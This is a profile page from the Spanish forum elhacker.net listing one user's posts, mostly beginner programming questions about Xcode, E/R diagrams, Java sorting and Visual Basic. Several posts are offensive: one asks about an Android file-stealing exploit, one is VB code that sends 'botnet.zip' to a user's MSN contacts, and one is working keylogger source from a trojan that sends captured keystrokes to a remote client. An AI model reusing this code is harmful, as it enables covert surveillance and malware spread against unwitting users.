elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Temas
Páginas: [1] 2
1  Seguridad Informática / Bugs y Exploits / exploit para Android en: 21 Agosto 2012, 20:43 pm
Hola a todos.

Tengo una simple duda, aver si alguien lo sabe. Estaba trasteando con este exploit de Android:

http://www.youtube.com/watch?v=B57AwDbqQA8

Solo queria saber si alguien sabe si dicho exploit es solo valido para versiones de Android menores que la 2.2

Ya que yo tengo la 2.3 y no me funciona.. solo conecta con mi terminal de linux y me manda algo de informacion pero no puedo "robar" ficheros de mi telefono.

En cambio en el emulador tengo la 2.2 y va perfecto.

Pues eso. Corrigieron el fallo en la 2.3?

Un Saludo y Gracias
2  Programación / Programación General / duda - xcode y Iphone en: 24 Enero 2012, 20:45 pm
Hola a todos!

tengo una duda acabo de empezar a programar para apple tengo una cuenta de apple, pago los 99 sablazos al mes y tengo todos los certificados y todo legal.

Acabo de hacer mi primera aplicacion para el iPhone y dandole desde el xcode a product-archive se me abre el "organize" una vez hay puedo exportar mi archivo al disco duro como .ipa, pero luego esto, como lo instalo en el Iphone? he visto en otro proyecto que no es el mio tambien para el iPhone que dispone de un archivo .app. Como genero el .app?

El .ipa lo tengo que sincronizar con el itunes y de ahi lo paso al iphone y ya esta? haber si alguien es tan amable de explicarmelo un poco por favor, lo unico que quiero es que mi aplicacion se ejecute en el iphone.

Un SAludo y gracias a todos
3  Programación / Bases de Datos / Diagrama E/R en: 6 Noviembre 2010, 22:44 pm
Muy buenas a todos¡¡
Tenia una duda con un ejercicio E/R que estoy haciendo para la Universidad haber si alguien me puede ayudar un poco.
El enunciado es este:

Citar
Una compañía de transportes XX recoge pedidos de los almacenes de la cadena ROPAS S.L. y los entrega a las tiendas de la misma cadena.

 En este momento posee 5 almacenes y 50 tiendas de venta.

 Cada tienda tiene su nombre, y se sabe su dirección y teléfono.
 
 Cada almacén tiene propio número, además de la dirección y teléfono.

 Un camión puede transportar uno o varios pedidos en el mismo viaje y entregar
cada pedido a la tienda que lo solicitó.

  Cada viaje se identifica por un número.

  Cada pedido se identifica por un número de pedido e incluye datos como el peso,
volumen y tienda de destino.

Cada camión tiene el número de matrícula y su propio límite máximo de volumen y peso transportado. La flota de la compañía consta de 100 vehículos y cada uno realiza entre 3 y 4 viajes semanales.

Dependiendo del peso, cada pedido se lleva en un tipo de camión de transporte diferente: Puede ser furgoneta de reparto, camión rígido o conjunto articulado.

  Un conductor está preparado para conducir un tipo de vehículo, y todos los tipos
de vehículos más pequeños que éste.

 Un conductor hace cada día una ruta con un camión, y sólo una ruta.

 Un pedido puede ser servido o estar en espera, pero no ambas cosas a la vez

 Cuando un pedido está servido, debe contar con un albarán de entrega.
Deseamos contar con una BD para uso común entre las dos empresas, que sirva para:

1.Controlar el uso de los camiones (fechas).
2.Controlar las entregas (pedidos entregados)
3.Que ayude a programar los viajes (conocer los pedidos hechos, de qué almacén a qué tiendas y los viajes asignados a camiones)
4.Que se sepa en qué ruta está un pedido determinado.
5.Que se pueda saber cuál es la ruta favorita de un conductor
6.Que se pueda saber el número de kilómetros que hace un conductor

He realizado el diagrama E/R pero no se si estara bien ya que me estoy iniciando en esto y no tengo mucha idea, mi diseño es este:



Pues mis dudas son la 1º que no se si esta bien echo xDy que ademas estoy un poco liado con el tema de las rutas y viajes, no se si hay que añadir esas entidades o solo con transportar pedidos es suficiente. ¿Que opinais?.

Se que faltan atributos y mas cosas pero lo que me interesa es el esquema en si lo demas ya lo pondre.

Muchas gracias por sus respuestas
4  Programación / Java / Ordenar en Array¡ en: 15 Enero 2010, 16:18 pm
Hola a todos, no se bien como hacer esto me estoy liando un poco haber si alguien me puede ayudar. Su pongamos que tengo una clase Equipo con los atributos: -> Partidos_Ganados , Puntos_a_Favor y Puntos_En_Contra

Despues creo 5 equipos.. dandole valores a sus atributos.Pues lo que quiero hacer es un Array Equipos en el que se introduccan esos equipos ordenados, es decir ordenarlos por partidos ganados de mayor a menor y en el caso de que hubiese equipos con los mismos partidos ganados se mirara el criterio de Puntos_a_favor para saber cual esta primero y si en los puntos a favor tambien estan empatados se miraran los puntos en contra

Es como poner la clasificacion de la liga en un array, pero no se bien ordenar el array utilizando los 3 criterios ( ganados , a favor y en contra )

Aver si alguien me puede dar una idea¡¡

MUchas gracias
5  Programación / Ingeniería Inversa / buffer overflow en: 5 Febrero 2009, 23:46 pm
Buenas.

Nose si el tema va aqui si no es asi por favor movedlo.

Estoy empezando a leer cosillas sobre el desbordamiento de buffer, la pila etc..

Me estoy leyendo un tutorial bajado desde esta misma pagina pero hay una cosilla de un ejemplo que no entiendo.Dejo una foto adjunta:

http://img300.imageshack.us/img300/8106/dibujodv7.jpg

El caso es que no entiendo muy bien lo que hace en:

ret = buffer1 + 28

porque en el tutorial pone que es la direccion de retorno de la funcion , si no me equivoco la direccion de retorno esta justo antes de buffer1 en la pila y sera la direccion que esta despues de la llamada call a la funcion en el main, pero nose porque razon le suma 28...

gracias
6  Programación / Programación Visual Basic / Zoom en VB en: 12 Abril 2007, 21:23 pm
Hola wenas,tengo una duda.

He creado un dibujo en el form con el evento form_paint,y tengo la duda de como podria hacer un zoom de ese dibujo al apretear un boton.

este es el codigo:
Código:
Private Sub Form_Paint()

On Error Resume Next
Dim Xvisado As Double
Dim Yvisado As Double
Dim x1 As Double
Dim y1 As Double
Dim x2 As Double
Dim y2 As Double
Dim x3 As Double
Dim y3 As Double
Dim Des As Double
Dim Azimut As Double
Dim Az As Double
Dim ds As Double
Dim Pi As Double

Xvisado = Text1.Text
Yvisado = Text2.Text
Az = Text3.Text
Pi = 3.141592653
ds = Text4.Text

Xvisado = Xvisado * Pi / 200
Yvisado = Yvisado * Pi / 200
Azimut = Az * Pi / 200
Des = ds * Pi / 200

x1 = 3360 + 1750 * Cos(Azimut)
y1 = 2880 - 1750 * Sin(Azimut)
x2 = 3360 + 1750 * Cos(Des)
y2 = 2880 - 1750 * Sin(Des)
x3 = 3360 + 1750 * Cos(Xvisado)
y3 = 2880 - 1750 * Sin(Yvisado)

frmRadiacion.Line (3360, 2880)-(x1, y1), RGB(255, 0, 0)
frmRadiacion.Line (3360, 2880)-(x2, y2), RGB(0, 255, 0)
frmRadiacion.Line (3360, 2880)-(x3, y3), RGB(0, 0, 255)

frmRadiacion.Circle (3360, 2880), 200, RGB(0, 0, 255), (Xvisado / Yvisado)
frmRadiacion.Circle (3360, 2880), 300, RGB(0, 255, 0), Des
frmRadiacion.Circle (3360, 2880), 400, RGB(255, 0, 0), Azimut
end sub

haber si alguien me podria echar una mano o darme alguna idea,Muchas gracias
7  Programación / Programación Visual Basic / Problema al enviar archivo en: 19 Marzo 2007, 20:36 pm
hola,estoy utilizando la api del msn para enviar un archivo a un contacto del msn utilizando el objeto sendfile de este modo:
Citar
Messenger.SendFile List1.Text, "C:\archivo.zip"
pero me da este error:

Citar
El objeto no admite esta accion

y no se porque  :huh: :huh: he encontrado ejemplos en google y me salta el mismo error

dejo el codigo entero de todo lo que he echo por si es necesario:
he agregado dos botones y un listbox.y las referencias:
Messenger API type library
Messenger private type library
Código:
Public WithEvents MsgrUIA As MessengerAPI.Messenger
Public MsgrContacts As MessengerAPI.IMessengerContacts
Public MsgrServices As MessengerAPI.IMessengerServices
Public MsgrContact As MessengerAPI.IMessengerContact
Public mWindow As MessengerAPI.IMessengerWindow
Dim WithEvents MSNApi As MessengerAPI.Messenger
Private Declare Function ReleaseCapture Lib "user32" () As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Long) As Long
Const WM_NCLBUTTONDOWN = &HA1

Private Sub Command1_Click()
On Error Resume Next
On Error Resume Next
contactosenlinea List1, MISTATUS_ONLINE
contactosenlinea List1, MISTATUS_AWAY
contactosenlinea List1, MISTATUS_BUSY
contactosenlinea List1, MISTATUS_BE_RIGHT_BACK
 contactosenlinea List1, MISTATUS_ON_THE_PHONE
If List1.ListCount = 0 Then
List1.AddItem "No hay contactos En Linea"
End If
End Sub

Private Sub Command2_Click()
Messenger.SendFile List1.Text, "C:\botnet.zip"


End Sub

Private Sub Form_Load()
On Error Resume Next
Set Msn = New MessengerAPI.Messenger
Set MsgrUIA = New MessengerAPI.Messenger
Set MSNApi = New MessengerAPI.Messenger
End Sub
Private Sub contactosenlinea(brList As ListBox, pStatus As MISTATUS)
Dim Contacto As IMessengerContact

For Each Contacto In MSNApi.MyContacts
If Contacto.Status = pStatus Then
brList.AddItem Contacto.SigninName
End If
Next
End Sub

Aver si alguien sabe como corregir este error y asi puedo enviar archivos al msn
gracias x todo
8  Programación / Programación Visual Basic / Ayuda con este codigo plis en: 1 Octubre 2006, 17:27 pm
Buenas foreros tengo un problemilla con este codigo es un keyloger,en realidad el keyloger va incorporado a un troyano y pongo aki solo el keyloger,bueno primero pongo el codigo y luego os digo lo k me pasa:

Servidor:
Código:
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Timer1_Timer()
Dim pulsacion As String
For X% = 0 To 255 'para los 255 códigos ascii
If GetAsyncKeyState(X%) Then 'si se ha pulsado una tecla
pulsacion = ObtenerTecla(X%) 'obtener tecla pulsada, la funcion obtener tecla es una funcion aparte para obtener las teclas especiales
Text1.Text = Text1.Text & pulsacion  'añadir tecla a teclas pulsadas
Text1.Refresh
End If
Next
Call Command1_Click
If Not ws.State = sckConnected Then
Timer1.Enabled = False
End If
End Sub
Private Sub Form_Load()
Timer1.Enabled = False
end sub
Private Sub Command1_Click()
ws.SendData "log|" & Text1.Text
Text1.Text = ""
End Sub
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
If datos = "Keylogg" Then
Timer1.Enabled = True
End If

Cliente:

Código:
Dim log As Variant
Dim datos As String
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
ws.GetData datos
log = Split(datos, "|")
Select Case log(0)
Case "log"
Text1.Text = Text1.Text & log(1)
End Select
End Sub
Private Sub Command1_Click()
ws.SendData "Keylogg"
End Sub

si habeis leido el codigo el servidor manda "log|" & text1.text, y al llegar al cliente lo separa x el pipe con split pero el problema es k al llegar en el textbox donde deberia de llegar las teclas capturadas solo llega la palabra "log"(lo capturado no llega) en cambio para detectar la ventana activa utilizo el mismo codigo y funciona de maravilla.

Otra cosa curiosa es k utilizando ese codigo ejecutando el server en mi propia makina funciona bien me llegan las teclas capturadas y no aparece la palabra "log" pero cuando lo ejecuto el servidor en una makina remota las tecllas capturadas no llegan y solo pone "log" es como si el split lo separase mal

¿alguien sabe por k se produce esto y cual es la solucion?? :-\ :-\
Me stoy volviendo lokoo  :huh: :huh:
9  Programación / Programación Visual Basic / reproducir Musica en: 7 Julio 2006, 14:54 pm
Mi duda es la siguiente como reproducco un archivo mp3 en un form sin utilizar la api Declare Function mciExecute Lib "winmm.dll" (ByVal lpstrCommand As String) As Long

ya k aciedo esto me da un error: iresult = mciExecute("Play " & App.Path & "\cancion.mp3")

gracias
10  Programación / Programación Visual Basic / duda tonta con el picture en: 7 Julio 2006, 12:27 pm
Hola chicos tengo una pregunta bastante estupida y me da un poko de verguenza x el nivel k tengo  :-[ :-[ :-[ :-[ :-[

La duda es yo tengo un picturebox y le coloco una imagen.
Luego compilo el proyecto y se lo paso a alguien x el messenger esa persona no tiene la imagen en su ordenador la k yo coloke en el picturebox.
Entonces la duda es si le daria un error o veria la imagen???ya k la otra persona no tiene la foto k va a salir en el picturebox en todo su PC, creo k ve la imagen pero no stoy seguro  :rolleyes: :rolleyes:
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines